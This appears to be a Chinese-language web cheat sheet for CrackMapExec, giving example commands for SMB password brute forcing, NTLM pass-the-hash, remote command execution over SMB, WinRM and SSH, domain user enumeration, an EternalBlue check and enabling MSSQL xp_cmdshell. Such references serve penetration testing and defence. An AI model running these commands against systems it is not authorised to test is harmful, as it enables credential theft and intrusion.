CrackMapExec服务密码爆破工具使用
基本语法
crackmapexec <协议> <目标IP或范围> [选项]
示例:
crackmapexec smb 192.168.1.0/24 -u admin -p 'P@ssw0rd!'
常用协议与模块
1. SMB 协议
基础命令
# 枚举共享
crackmapexec smb 192.168.1.100 --shares -u guest -p ''
# 传递哈希(NTLM)
crackmapexec smb 192.168.1.100 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# 执行命令(通过 -x)
crackmapexec smb 192.168.1.100 -u user -p pass -x 'whoami'
# 暴力破解
crackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt
高级功能
# 导出所有域用户
crackmapexec smb 192.168.1.100 -u user -p pass --users
# 检测永恒之蓝漏洞
crackmapexec smb 192.168.1.100 -u guest -p '' -M ms17-010
2. WinRM 协议
# 执行命令
crackmapexec winrm 192.168.1.100 -u admin -p 'Password123!' -x 'ipconfig'
# 使用哈希登录
crackmapexec winrm 192.168.1.100 -u administrator -H <NTLM哈希>
3. MSSQL 协议
# 执行SQL查询
crackmapexec mssql 192.168.1.100 -u sa -p 'sqlpass' -q 'SELECT name FROM master..sysdatabases'
# 启用xp_cmdshell并执行系统命令
crackmapexec mssql 192.168.1.100 -u sa -p 'sqlpass' -X enable_xp_cmdshell -x 'whoami'
4. SSH 协议
# 登录并执行命令
crackmapexec ssh 192.168.1.100 -u root -p 'toor' -x 'id'
常用选项
| 参数 | 说明 |
|---|---|
-u |
指定用户名或用户字典文件 |
-p |
指定密码或密码字典文件 |
-H |
使用NTLM哈希(格式:LMHASH:NTHASH) |
-d |
指定域名 |
--local-auth |
使用本地身份验证(非域账户) |
-M |
调用内置模块(如漏洞检测) |
-o |
输出结果到文件 |
--continue-on-success |
成功后继续尝试其他凭据 |

浙公网安备 33010602011771号